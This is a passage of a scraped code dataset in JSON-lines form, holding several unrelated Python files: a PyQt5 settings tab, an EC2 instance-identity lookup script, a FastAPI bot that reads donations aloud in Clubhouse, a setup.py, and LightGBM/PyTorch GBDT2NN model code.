https://github.com/fedhere/PUI2017_fb55/blob/master/Lab2_fb55/aSimplePython\n# ThatWritesToCSV.py on 2017/09/27 ","repo_name":"andrewnell/PUI2017_adn323","sub_path":"HW2_adn323/get_bus_info_adn323.py","file_name":"get_bus_info_adn323.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15594424211","text":"from PyQt5 import QtGui, QtWidgets\n\nfrom openlp.core.common.i18n import UiStrings, translate\nfrom openlp.core.lib.settingstab import SettingsTab\nfrom openlp.core.lib.ui import create_valign_selection_widgets\nfrom openlp.core.widgets.buttons import ColorButton\n\n\nclass AlertsTab(SettingsTab):\n \"\"\"\n AlertsTab is the alerts settings tab in the settings dialog.\n \"\"\"\n def setup_ui(self):\n self.setObjectName('AlertsTab')\n super(AlertsTab, self).setup_ui()\n self.font_group_box = QtWidgets.QGroupBox(self.left_column)\n self.font_group_box.setObjectName('font_group_box')\n self.font_layout = QtWidgets.QFormLayout(self.font_group_box)\n self.font_layout.setObjectName('font_layout')\n self.font_label = QtWidgets.QLabel(self.font_group_box)\n self.font_label.setObjectName('font_label')\n self.font_combo_box = QtWidgets.QFontComboBox(self.font_group_box)\n self.font_combo_box.setObjectName('font_combo_box')\n self.font_layout.addRow(self.font_label, self.font_combo_box)\n self.font_color_label = QtWidgets.QLabel(self.font_group_box)\n self.font_color_label.setObjectName('font_color_label')\n self.font_color_button = ColorButton(self.font_group_box)\n self.font_color_button.setObjectName('font_color_button')\n self.font_layout.addRow(self.font_color_label, self.font_color_button)\n self.font_size_label = QtWidgets.QLabel(self.font_group_box)\n self.font_size_label.setObjectName('font_size_label')\n self.font_size_spin_box = QtWidgets.QSpinBox(self.font_group_box)\n self.font_size_spin_box.setObjectName('font_size_spin_box')\n self.font_layout.addRow(self.font_size_label, self.font_size_spin_box)\n self.left_layout.addWidget(self.font_group_box)\n # Background Settings\n self.background_group_box = QtWidgets.QGroupBox(self.left_column)\n self.background_group_box.setObjectName('background_group_box')\n self.background_layout = QtWidgets.QFormLayout(self.background_group_box)\n self.background_layout.setObjectName('background_settings_layout')\n self.background_color_label = QtWidgets.QLabel(self.background_group_box)\n self.background_color_label.setObjectName('background_color_label')\n self.background_color_button = ColorButton(self.background_group_box)\n self.background_color_button.setObjectName('background_color_button')\n self.background_layout.addRow(self.background_color_label, self.background_color_button)\n self.left_layout.addWidget(self.background_group_box)\n # Scroll Settings\n self.scroll_group_box = QtWidgets.QGroupBox(self.left_column)\n self.scroll_group_box.setObjectName('scroll_group_box')\n self.scroll_group_layout = QtWidgets.QFormLayout(self.scroll_group_box)\n self.scroll_group_layout.setObjectName('scroll_group_layout')\n self.scroll_check_box = QtWidgets.QCheckBox(self.scroll_group_box)\n self.scroll_check_box.setObjectName('scroll_check_box')\n self.scroll_group_layout.addRow(self.scroll_check_box)\n self.repeat_label = QtWidgets.QLabel(self.scroll_group_box)\n self.repeat_label.setObjectName('repeat_label')\n self.repeat_spin_box = QtWidgets.QSpinBox(self.scroll_group_box)\n self.repeat_spin_box.setObjectName('repeat_spin_box')\n self.scroll_group_layout.addRow(self.repeat_label, self.repeat_spin_box)\n self.left_layout.addWidget(self.scroll_group_box)\n # Other Settings\n self.settings_group_box = QtWidgets.QGroupBox(self.left_column)\n self.settings_group_box.setObjectName('settings_group_box')\n self.settings_layout = QtWidgets.QFormLayout(self.settings_group_box)\n self.settings_layout.setObjectName('settings_layout')\n self.timeout_label = QtWidgets.QLabel(self.settings_group_box)\n self.timeout_label.setObjectName('timeout_label')\n self.timeout_spin_box = QtWidgets.QSpinBox(self.settings_group_box)\n self.timeout_spin_box.setMaximum(180)\n self.timeout_spin_box.setObjectName('timeout_spin_box')\n self.settings_layout.addRow(self.timeout_label, self.timeout_spin_box)\n self.vertical_label, self.vertical_combo_box = create_valign_selection_widgets(self.font_group_box)\n self.vertical_label.setObjectName('vertical_label')\n self.vertical_combo_box.setObjectName('vertical_combo_box')\n self.settings_layout.addRow(self.vertical_label, self.vertical_combo_box)\n self.left_layout.addWidget(self.settings_group_box)\n self.left_layout.addStretch()\n self.preview_group_box = QtWidgets.QGroupBox(self.right_column)\n self.preview_group_box.setObjectName('preview_group_box')\n self.preview_layout = QtWidgets.QVBoxLayout(self.preview_group_box)\n self.preview_layout.setObjectName('preview_layout')\n self.font_preview = QtWidgets.QLineEdit(self.preview_group_box)\n self.font_preview.setObjectName('font_preview')\n self.preview_layout.addWidget(self.font_preview)\n self.right_layout.addWidget(self.preview_group_box)\n self.right_layout.addStretch()\n # Signals and slots\n self.background_color_button.colorChanged.connect(self.on_background_color_changed)\n self.font_color_button.colorChanged.connect(self.on_font_color_changed)\n self.font_combo_box.activated.connect(self.on_font_combo_box_clicked)\n self.timeout_spin_box.valueChanged.connect(self.on_timeout_spin_box_changed)\n self.font_size_spin_box.valueChanged.connect(self.on_font_size_spin_box_changed)\n self.repeat_spin_box.valueChanged.connect(self.on_repeat_spin_box_changed)\n self.scroll_check_box.toggled.connect(self.scroll_check_box_toggled)\n\n def retranslate_ui(self):\n self.font_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Font Settings'))\n self.font_label.setText(translate('AlertsPlugin.AlertsTab', 'Font name:'))\n self.font_color_label.setText(translate('AlertsPlugin.AlertsTab', 'Font color:'))\n self.background_color_label.setText(UiStrings().BackgroundColorColon)\n self.font_size_label.setText(translate('AlertsPlugin.AlertsTab', 'Font size:'))\n self.font_size_spin_box.setSuffix(' {unit}'.format(unit=UiStrings().FontSizePtUnit))\n self.background_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Background Settings'))\n self.settings_group_box.setTitle(translate('AlertsPlugin.AlertsTab', 'Other Settings'))\n self.timeout_label.setText(translate('AlertsPlugin.AlertsTab', 'Alert timeout:'))\n self.timeout_spin_box.setSuffix(' {unit}'.format(unit=UiStrings().Seconds))\n self.repeat_label.setText(translate('AlertsPlugin.AlertsTab', 'Repeat (no. of times):'))\n self.scroll_check_box.setText(translate('AlertsPlugin.AlertsTab', 'Enable Scrolling'))\n self.preview_group_box.setTitle(UiStrings().Preview)\n self.font_preview.setText(UiStrings().OpenLP)\n\n def on_background_color_changed(self, color):\n \"\"\"\n The background color has been changed.\n \"\"\"\n self.background_color = color\n self.update_display()\n\n def on_font_combo_box_clicked(self):\n \"\"\"\n The Font Combo was changed.\n \"\"\"\n self.update_display()\n\n def on_font_color_changed(self, color):\n \"\"\"\n The Font Color button has clicked.\n \"\"\"\n self.font_color = color\n self.update_display()\n\n def on_timeout_spin_box_changed(self):\n \"\"\"\n The Time out spin box has changed.\n\n \"\"\"\n self.timeout = self.timeout_spin_box.value()\n self.changed = True\n\n def on_font_size_spin_box_changed(self):\n \"\"\"\n The font size spin box has changed.\n \"\"\"\n self.font_size = self.font_size_spin_box.value()\n self.update_display()\n\n def on_repeat_spin_box_changed(self):\n \"\"\"\n The repeat spin box has changed\n \"\"\"\n self.repeat = self.repeat_spin_box.value()\n self.changed = True\n\n def scroll_check_box_toggled(self):\n \"\"\"\n The scrolling checkbox has been toggled\n \"\"\"\n if self.scroll_check_box.isChecked():\n self.repeat_spin_box.setEnabled(True)\n else:\n self.repeat_spin_box.setEnabled(False)\n self.scroll = self.scroll_check_box.isChecked()\n self.changed = True\n\n def load(self):\n \"\"\"\n Load the settings into the UI.\n \"\"\"\n self.settings.beginGroup(self.settings_section)\n self.timeout = self.settings.value('timeout')\n self.font_color = self.settings.value('font color')\n self.font_size = self.settings.value('font size')\n self.background_color = self.settings.value('background color')\n self.font_face = self.settings.value('font face')\n self.location = self.settings.value('location')\n self.repeat = self.settings.value('repeat')\n self.scroll = self.settings.value('scroll')\n self.settings.endGroup()\n self.font_size_spin_box.setValue(self.font_size)\n self.timeout_spin_box.setValue(self.timeout)\n self.font_color_button.color = self.font_color\n self.background_color_button.color = self.background_color\n self.repeat_spin_box.setValue(self.repeat)\n self.repeat_spin_box.setEnabled(self.scroll)\n self.vertical_combo_box.setCurrentIndex(self.location)\n self.scroll_check_box.setChecked(self.scroll)\n font = QtGui.QFont()\n font.setFamily(self.font_face)\n self.font_combo_box.setCurrentFont(font)\n self.update_display()\n self.changed = False\n\n def save(self):\n \"\"\"\n Save the changes on exit of the Settings dialog.\n \"\"\"\n self.settings.beginGroup(self.settings_section)\n # Check value has changed as no event handles this field\n if self.settings.value('location') != self.vertical_combo_box.currentIndex():\n self.changed = True\n self.settings.setValue('background color', self.background_color)\n self.settings.setValue('font color', self.font_color)\n self.settings.setValue('font size', self.font_size)\n self.font_face = self.font_combo_box.currentFont().family()\n self.settings.setValue('font face', self.font_face)\n self.settings.setValue('timeout', self.timeout)\n self.location = self.vertical_combo_box.currentIndex()\n self.settings.setValue('location', self.location)\n self.settings.setValue('repeat', self.repeat)\n self.settings.setValue('scroll', self.scroll_check_box.isChecked())\n self.settings.endGroup()\n if self.changed:\n self.settings_form.register_post_process('update_display_css')\n self.changed = False\n\n def update_display(self):\n \"\"\"\n Update the preview display after changes have been made,\n \"\"\"\n font = QtGui.QFont()\n font.setFamily(self.font_combo_box.currentFont().family())\n font.setBold(True)\n font.setPointSize(self.font_size)\n self.font_preview.setFont(font)\n self.font_preview.setStyleSheet('background-color: {back}; color: {front}'.format(back=self.background_color,\n front=self.font_color))\n self.changed = True\n","repo_name":"ipic/projecao","sub_path":"openlp/plugins/alerts/lib/alertstab.py","file_name":"alertstab.py","file_ext":"py","file_size_in_byte":11457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28264453301","text":"import sys\nimport requests\n\n\ndef _help_():\n meta_data = {\n 'all': 'Provides all the details of your instance',\n 'accountId': 'Provides Account Id of your instance',\n 'architecture': 'Provides architecture of your instance',\n 'availabilityZone': 'Provides Availability Zone of your instance',\n 'billingProducts': \"Provides Billing Products of your instance\",\n 'devpayProductCodes': \"Provides payable products of your instance\",\n 'marketplaceProductCodes': \"Provides Marketplace details of your instance\",\n 'imageId': \"Provides AMI number/Id of your instance\",\n 'instanceId': 'Provides instance Id of your instance',\n 'instanceType': 'Provides instance type', 'kernelId': \"Provides kernelId of your instance\",\n 'pendingTime': 'Provides pending time of your instance',\n 'privateIp': 'Provides Private IP of your instance',\n 'ramdiskId': \"Provides RAM disk Id of your instance\", 'region': 'Provides region of your instance',\n 'version': 'Provides version of your instance'\n }\n print(\"Use any option provided below as a flag to run the script\")\n for key, value in meta_data.items():\n print(\"Option: {} ({})\".format(key, value))\n\n\ndef get_meta_data(key=\"all\"):\n url = \"http://169.254.169.254/latest/dynamic/instance-identity/document\"\n response = requests.get(url)\n if response.status_code == 200:\n response = response.json()\n if key == \"all\":\n return response\n else:\n if key in response:\n return response[key]\n else:\n return \"Please check the key provided \\nUse help for more options\\n \" \\\n \"if no key is provided all is considered by default\"\n else:\n return \"Please try again after sometime\"\n\n\nflag = sys.argv[-1]\n\n\nif flag == \"help\":\n _help_()\nelse:\n if flag != \"challenge2.py\":\n print(get_meta_data(flag))\n else:\n print(get_meta_data())\n","repo_name":"AkshayArni003/Interview","sub_path":"coding/challenge2.py","file_name":"challenge2.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74378122793","text":"#用requests库下载图片\nimport unittest\nimport requests\nimport io\nimport matplotlib.pyplot as plt\n\n\nclass SimpleImageDownloaderTest(unittest.TestCase):\n def test_download_image(self):\n resp = requests.get('https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png') # 目标图片的url\n with open('D:/python/venv/onlinelearning/a.jpg', 'wb')as f: # 使用with结构打开本地文件,如果省略路径则在当前目录中\n f.write(resp.content) # 将二进制数据写入到文件中\n\n # 用PIL库以流的方式读取此图片的内容\n from PIL import Image\n img = Image.open('D:/python/venv/onlinelearning/a.jpg')\n print(img)\n\n # 用matplotlib中的matplotlib.pyplot.imshow函数显示该图片\n plt.subplot(221);\n plt.imshow(img)\n plt.show()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"yzxty/learngit","sub_path":"python/py6_1.py","file_name":"py6_1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38428400406","text":"import unittest\n\nfrom faker import Faker\n\nfrom .model_test import ModelTest\nfrom random import randrange\n\nclass TestLottery(ModelTest):\n\n\n faker = Faker()\n\n @classmethod\n def setUpClass(cls):\n super(TestLottery, cls).setUpClass()\n\n from mib.models import lottery\n cls.lottery = lottery\n\n @staticmethod\n def assertLotteryEquals(value, expected):\n t = unittest.FunctionTestCase(TestLottery)\n t.assertEqual(value.id, expected.id)\n t.assertEqual(value.ticket_number, expected.ticket_number)\n t.assertEqual(value.points, expected.points)\n \n @staticmethod\n def generate_random_lottery_row():\n id = randrange(100000)\n ticket_number = randrange(100)\n points = 0\n\n from mib.models import Lottery\n\n lottery = Lottery(\n id = id,\n ticket_number = ticket_number,\n points = points\n )\n\n return lottery\n\n def test_set_ticket_number(self):\n row = TestLottery.generate_random_lottery_row()\n row.set_ticket_number(15)\n\n self.assertEqual(\n row.ticket_number,\n 15\n )\n def test_unset_ticket_number(self):\n row = TestLottery.generate_random_lottery_row()\n row.unset_ticket_number()\n self.assertEqual(\n row.ticket_number,\n -1\n )\n def test_add_points(self):\n row = TestLottery.generate_random_lottery_row()\n points = row.points\n row.add_points(5)\n self.assertEqual(row.points, points+5)\n\n def test_set_points(self):\n row = TestLottery.generate_random_lottery_row()\n row.set_points(5)\n self.assertEqual(row.points,5)\n","repo_name":"lcnz/mib-lottery","sub_path":"tests/models/test_lottery.py","file_name":"test_lottery.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70444247592","text":"from typing import Optional\nimport json\nimport asyncio\n\nimport websockets\nimport agorartc\nfrom fastapi import FastAPI, Query, Form, Request, status, BackgroundTasks\nfrom fastapi.responses import RedirectResponse, HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom gtts import gTTS\nfrom clubhouse.clubhouse import Clubhouse\n\nfrom donatehouse import da\nfrom donatehouse import settings\nfrom donatehouse import utils\n\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory='donatehouse/templates')\n\n\nclass ClubhouseConfig(BaseModel):\n user_id: Optional[str]\n user_token: Optional[str]\n user_device: Optional[str]\n channel_id: Optional[str]\n language: Optional[str]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n clubhouse_config = utils.read_ch_config()\n self.user_id = clubhouse_config.get('user_id')\n self.user_token = clubhouse_config.get('user_token')\n self.user_device = clubhouse_config.get('user_device')\n self.channel_id = clubhouse_config.get('channel_id')\n self.language = clubhouse_config.get('language')\n\n\nclass DaConfig(BaseModel):\n client_id: Optional[int]\n client_secret: Optional[str]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n config = utils.read_da_config()\n self.client_id = config.get('client_id')\n self.client_secret = config.get('client_secret')\n\n\nch_config = ClubhouseConfig()\nclient = Clubhouse(user_id=ch_config.user_id,\n user_token=ch_config.user_token,\n user_device=ch_config.user_device)\n\nda_config = DaConfig()\nda = da.DonationAlertsApi(da_config.client_id,\n da_config.client_secret,\n settings.REDIRECT_URI,\n settings.SCOPE)\n\n\n@app.get('/index')\nasync def index():\n if not (ch_config.user_id\n and ch_config.user_token\n and ch_config.user_device\n and ch_config.channel_id\n and ch_config.language):\n return RedirectResponse('/enter_phone')\n\n if not (da_config.client_id and da_config.client_secret):\n return RedirectResponse('/da_config')\n\n return RedirectResponse(da.authorize())\n\n\n@app.get('/')\nasync def default_handler():\n return ''\n\n\n@app.get('/code')\nasync def da_code_handler(background_tasks: BackgroundTasks,\n code: str = Query(...),):\n da.get_access_token(code)\n da.get_user_info()\n background_tasks.add_task(connect)\n return RedirectResponse('/', status_code=status.HTTP_303_SEE_OTHER)\n\n\n@app.get('/enter_phone', response_class=HTMLResponse)\nasync def enter_phone_page(request: Request):\n return templates.TemplateResponse('enter_phone.html', {\"request\": request})\n\n\n@app.post('/clubhouse_auth', response_class=HTMLResponse)\nasync def clubhouse_config_page(request: Request,\n phone_number: str = Form(...)):\n client.start_phone_number_auth(phone_number)\n return templates.TemplateResponse('clubhouse_config.html',\n {\"request\": request,\n 'phone_number': phone_number})\n\n\n@app.post('/clubhouse_config')\nasync def clubhouse_config_handler(phone_number: str = Form(...),\n code: str = Form(...),\n channel: str = Form(...),\n lang: str = Form(...)):\n data = client.complete_phone_number_auth(phone_number, code)\n if 'user_profile' in data:\n ch_config.user_id = str(data['user_profile']['user_id'])\n ch_config.user_token = data['auth_token']\n ch_config.user_device = client.HEADERS.get(\"CH-DeviceId\")\n ch_config.channel_id = channel\n ch_config.language = lang\n\n utils.write_ch_config(str(data['user_profile']['user_id']),\n data['auth_token'],\n client.HEADERS.get(\"CH-DeviceId\"),\n channel,\n lang)\n\n return RedirectResponse('/index', status_code=status.HTTP_303_SEE_OTHER)\n\n\n@app.get('/da_config', response_class=HTMLResponse)\nasync def da_config_page(request: Request):\n return templates.TemplateResponse('da_config.html',\n {\"request\": request})\n\n\n@app.post('/da_config')\nasync def da_config_handler(client_id: int = Form(...),\n client_secret: str = Form(...)):\n da_config.client_id = client_id\n da_config.client_secret = client_secret\n da.client_id = client_id\n da.client_secret = client_secret\n utils.write_da_config(client_id, client_secret)\n return RedirectResponse('/index', status_code=status.HTTP_303_SEE_OTHER)\n\n\nasync def clubhouse_ping():\n while True:\n print('PING')\n client.active_ping(ch_config.channel_id)\n await asyncio.sleep(300)\n\n\nasync def connect():\n ch_config = ClubhouseConfig()\n client = Clubhouse(user_id=ch_config.user_id,\n user_token=ch_config.user_token,\n user_device=ch_config.user_device)\n async with websockets.connect(settings.CENTRIFUGO_WS) as ws:\n print('DA CONNECTED')\n await ws.send(json.dumps(da.ws_authorize()))\n data = await ws.recv()\n data = json.loads(data)\n da.set_centrifugo_client_id(data['result']['client'])\n da.subscribe()\n await ws.send(json.dumps(da.ws_connect()))\n await ws.recv()\n await ws.recv()\n\n RTC = agorartc.createRtcEngineBridge()\n event_handler = agorartc.RtcEngineEventHandlerBase()\n RTC.initEventHandler(event_handler)\n # 0xFFFFFFFE will exclude Chinese servers from Agora's servers.\n RTC.initialize(Clubhouse.AGORA_KEY,\n None,\n agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)\n # Enhance voice quality\n RTC.setAudioProfile(agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,\n agorartc.AUDIO_SCENARIO_GAME_STREAMING)\n\n channel_info = client.join_channel(ch_config.channel_id)\n\n asyncio.create_task(clubhouse_ping())\n\n channel_token = channel_info['token']\n users = channel_info['users']\n\n speaker_permission = False\n while not speaker_permission:\n for user in users:\n if bool(user['is_speaker']):\n data = client.accept_speaker_invite(ch_config.channel_id,\n user['user_id'])\n if data['success']:\n speaker_permission = True\n break\n print('Please, invite')\n await asyncio.sleep(10)\n\n while True:\n data = await ws.recv()\n data = json.loads(data)\n print(data)\n data = data['result']['data']['data']\n username = data['username']\n message = data['message']\n text_to_speech = f'Message from {username}. {message}'\n tts_obj = gTTS(text=text_to_speech,\n lang=ch_config.language,\n slow=False)\n tts_obj.save('donation.mp3')\n\n RTC.joinChannel(channel_token,\n ch_config.channel_id,\n \"\",\n int(ch_config.user_id))\n await asyncio.sleep(0.1)\n RTC.startAudioMixing('donation.mp3', False, True, 1)\n donation_duration = RTC.getAudioMixingDuration()\n await asyncio.sleep(donation_duration / 1000 + 0.5)\n RTC.leaveChannel()\n","repo_name":"kirillkuzin/donatehouse","sub_path":"donatehouse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4588856858","text":"# from os import path\nfrom io import open\nfrom setuptools import setup, find_packages\n\n\ndef read(f):\n return open(f, \"r\", encoding='utf-8').read()\n\n\nsetup(\n name=\"amocrm-api-wrapper\",\n version='0.0.17',\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=[\n \"requests\",\n ],\n description=\"Amocrm api wrapper v4\",\n author=\"bzdvdn\",\n author_email=\"bzdv.dn@gmail.com\",\n url=\"https://github.com/bzdvdn/amocrm-api-wrapper\",\n license=\"MIT\",\n python_requires=\">=3.6\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n)\n","repo_name":"bzdvdn/amocrm-api-wrapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"1783087237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2022/11/25 15:22\n\n@author: Yang Fan\n\n模型的组成,包括LightGBM的训练, 多棵树分组, Embedding模型, GBDT2NN模型\n\"\"\"\nimport math\n\nimport lightgbm as lgb\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport wandb\nfrom utils import ModelInterpreter\nfrom wandb.lightgbm import wandb_callback\n\n\n# LightGBM的训练\ndef TrainGBDT(train_x, train_y, test_x, test_y):\n params = {\n \"task\": \"train\",\n \"boosting_type\": \"gbdt\",\n \"num_class\": 1,\n \"objective\": \"regression\",\n \"metric\": \"mse\",\n \"boost_from_average\": True,\n \"num_leaves\": wandb.config.num_leaves,\n \"feature_fraction\": wandb.config.feature_fraction,\n \"bagging_freq\": wandb.config.bagging_freq,\n \"bagging_fraction\": wandb.config.bagging_fraction,\n \"num_threads\": wandb.config.num_threads,\n \"learning_rate\": wandb.config.tree_lr,\n \"seed\": wandb.config.seed,\n }\n lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params)\n lgb_eval = lgb.Dataset(test_x, test_y.reshape(-1), reference=lgb_train)\n # early_stop_callback = lgb.early_stopping(\n # stopping_rounds=wandb.config.early_stopping_rounds\n # )\n gbm = lgb.train(\n params,\n lgb_train,\n num_boost_round=wandb.config.num_trees,\n valid_sets=[lgb_eval],\n callbacks=[wandb_callback()],\n )\n preds = gbm.predict(test_x, raw_score=True)\n preds = preds.astype(np.float32)\n return gbm, preds\n\n\n# 将n棵树分组\ndef SubGBDTLeaf_cls(train_x, test_x, gbm):\n num_slices = wandb.config.num_slices\n MAX = train_x.shape[1]\n\n # get leaf prediction index\n leaf_preds = gbm.predict(train_x, pred_leaf=True).reshape(\n train_x.shape[0], -1\n )\n test_leaf_preds = gbm.predict(test_x, pred_leaf=True).reshape(\n test_x.shape[0], -1\n )\n n_trees = leaf_preds.shape[1]\n\n # get leaf output from each tree\n leaf_output = np.zeros(\n [n_trees, wandb.config.num_leaves], dtype=np.float32\n )\n for tree_id in range(n_trees):\n num_leaf = np.max(leaf_preds[:, tree_id]) + 1\n for leaf_id in range(num_leaf):\n leaf_output[tree_id][leaf_id] = gbm.get_leaf_output(\n tree_id, leaf_id\n )\n\n modelI = ModelInterpreter(gbm)\n clusterIdx = modelI.EqualGroup(num_slices)\n n_feature = wandb.config.feature_per_group\n treeI = modelI.trees\n\n for n_idx in range(num_slices):\n tree_indices = np.where(clusterIdx == n_idx)[0]\n trees = {}\n tid = 0\n for jdx in tree_indices:\n trees[str(tid)] = treeI[jdx].raw\n tid += 1\n\n all_hav = {}\n for jdx, tree in enumerate(tree_indices):\n for kdx, f in enumerate(treeI[tree].feature):\n if f == -2:\n continue\n if f not in all_hav:\n all_hav[f] = 0\n all_hav[f] += treeI[tree].gain[kdx]\n\n all_hav = sorted(all_hav.items(), key=lambda kv: -kv[1])\n used_features = [item[0] for item in all_hav[:n_feature]]\n\n for kdx in range(max(0, n_feature - len(used_features))):\n used_features.append(MAX)\n cur_leaf_preds = leaf_preds[:, tree_indices]\n cur_test_leaf_preds = test_leaf_preds[:, tree_indices]\n new_train_y = np.zeros(train_x.shape[0])\n for jdx in tree_indices:\n new_train_y += np.take(\n leaf_output[jdx, :].reshape(-1), leaf_preds[:, jdx].reshape(-1)\n )\n new_train_y = new_train_y.reshape(-1, 1).astype(np.float32)\n yield used_features, new_train_y, cur_leaf_preds, cur_test_leaf_preds, np.mean(\n np.take(leaf_output, tree_indices, 0)\n ), np.mean(\n leaf_output\n )\n\n\nclass BatchDense(nn.Module):\n def __init__(self, batch, in_features, out_features, bias_init=None):\n super(BatchDense, self).__init__()\n self.batch = batch\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(\n torch.Tensor(batch, in_features, out_features), requires_grad=True\n )\n self.bias = nn.Parameter(\n torch.Tensor(batch, 1, out_features), requires_grad=True\n )\n self.reset_parameters(bias_init)\n\n def reset_parameters(self, bias_init=None):\n stdv = math.sqrt(6.0 / (self.in_features + self.out_features))\n self.weight.data.uniform_(-stdv, stdv)\n if bias_init is not None:\n self.bias.data = torch.from_numpy(bias_init)\n else:\n self.bias.data.fill_(0)\n\n def forward(self, x):\n size = x.size()\n # Todo: avoid the swap axis\n x = x.view(x.size(0), self.batch, -1)\n out = x.transpose(0, 1).contiguous()\n out = torch.baddbmm(self.bias, out, self.weight)\n out = out.transpose(0, 1).contiguous()\n out = out.view(x.size(0), -1)\n return out\n\n\nclass EmbeddingModel(nn.Module):\n def __init__(\n self,\n n_models,\n max_ntree_per_split,\n embsize,\n maxleaf,\n n_output,\n out_bias=None,\n task=\"regression\",\n ):\n super(EmbeddingModel, self).__init__()\n self.task = task\n self.n_models = n_models\n self.maxleaf = maxleaf\n self.fcs = nn.ModuleList()\n self.max_ntree_per_split = max_ntree_per_split\n\n self.embed_w = nn.Parameter(\n torch.Tensor(n_models, max_ntree_per_split * maxleaf, embsize),\n requires_grad=True,\n )\n # torch.nn.init.xavier_normal(self.embed_w)\n stdv = math.sqrt(1.0 / (max_ntree_per_split))\n self.embed_w.data.normal_(0, stdv) # .uniform_(-stdv, stdv)\n\n self.bout = BatchDense(n_models, embsize, 1, out_bias)\n self.bn = nn.BatchNorm1d(embsize * n_models)\n self.tanh = nn.Tanh()\n self.sigmoid = nn.Sigmoid()\n # self.output_fc = Dense(n_models * embsize, n_output)\n self.dropout = torch.nn.Dropout()\n if task == \"regression\":\n self.criterion = nn.MSELoss()\n else:\n self.criterion = nn.BCELoss()\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n\n def one_hot(self, y, numslot, mask=None):\n y_tensor = (\n y.type(torch.LongTensor).contiguous().view(-1, 1).to(self.device)\n )\n tmp = torch.zeros(\n y_tensor.size()[0],\n numslot,\n device=self.device,\n dtype=torch.float32,\n requires_grad=False,\n ).to(self.device)\n y_one_hot = tmp.scatter_(1, y_tensor.to(self.device), 1)\n if mask is not None:\n y_one_hot = y_one_hot * mask\n y_one_hot = y_one_hot.view(y.shape[0], -1)\n return y_one_hot\n\n def batchmul(self, x, models, embed_w, length):\n out = self.one_hot(x, length)\n out = out.view(x.size(0), models, -1)\n out = out.transpose(0, 1).contiguous()\n out = torch.bmm(out, embed_w)\n out = out.transpose(0, 1).contiguous()\n out = out.view(x.size(0), -1)\n return out\n\n def lastlayer(self, x):\n out = self.batchmul(x, self.n_models, self.embed_w, self.maxleaf)\n out = self.bn(out)\n return out\n\n def forward(self, x):\n out = self.lastlayer(x)\n out = self.dropout(out)\n out = out.view(x.size(0), self.n_models, -1)\n out = self.bout(out)\n # out = self.output_fc(out)\n sum_out = torch.sum(out, -1, True)\n if self.task != \"regression\":\n return self.sigmoid(sum_out), out\n return sum_out, out\n\n def joint_loss(self, out, target, out_inner, target_inner, *args):\n return nn.MSELoss()(out_inner, target_inner)\n\n def true_loss(self, out, target):\n return self.criterion(out, target)\n\n\nclass GBDT2NN(nn.Module):\n def __init__(\n self,\n input_size,\n used_features,\n tree_layers,\n output_w,\n output_b,\n device=None,\n ):\n super(GBDT2NN, self).__init__()\n print(\"Init GBDT2NN\")\n self.n_models = len(used_features)\n self.tree_layers = tree_layers\n n_feature = len(used_features[0])\n used_features = np.asarray(used_features).reshape(-1)\n self.used_features = nn.Parameter(\n torch.from_numpy(used_features).to(device), requires_grad=False\n )\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n assert len(tree_layers) > 0\n self.bdenses = nn.ModuleList()\n self.bns = nn.ModuleList()\n self.bdenses.append(\n BatchDense(self.n_models, n_feature, tree_layers[0])\n )\n for i in range(1, len(tree_layers)):\n self.bdenses.append(\n BatchDense(self.n_models, tree_layers[i - 1], tree_layers[i])\n )\n for i in range(len(tree_layers) - 1):\n self.bns.append(nn.BatchNorm1d(tree_layers[i] * self.n_models))\n self.out_weight = nn.Parameter(\n torch.from_numpy(output_w).to(device), requires_grad=False\n )\n self.out_bias = nn.Parameter(\n torch.from_numpy(output_b).to(device), requires_grad=False\n )\n print(\"Init GBDT2NN succeed!\")\n self.criterion = nn.MSELoss()\n self.device = device\n\n def batchmul(self, x, f):\n out = x.view(x.size(0), self.n_models, -1)\n out = f(out)\n out = out.view(x.size(0), -1)\n return out\n\n def lastlayer(self, x):\n out = torch.index_select(\n x.to(self.device), dim=1, index=self.used_features.to(self.device)\n )\n for i in range(len(self.bdenses) - 1):\n out = self.batchmul(out, self.bdenses[i])\n out = self.bns[i](out)\n out = self.relu(out)\n return out\n\n def forward(self, x):\n out = self.lastlayer(x.float())\n pred = self.batchmul(out, self.bdenses[-1])\n out = torch.addmm(self.out_bias, pred, self.out_weight)\n return out, pred\n\n def emb_loss(self, emb_pred, emb_target):\n loss_weight = torch.abs(torch.sum(self.out_weight, 1))\n l2_loss = (\n 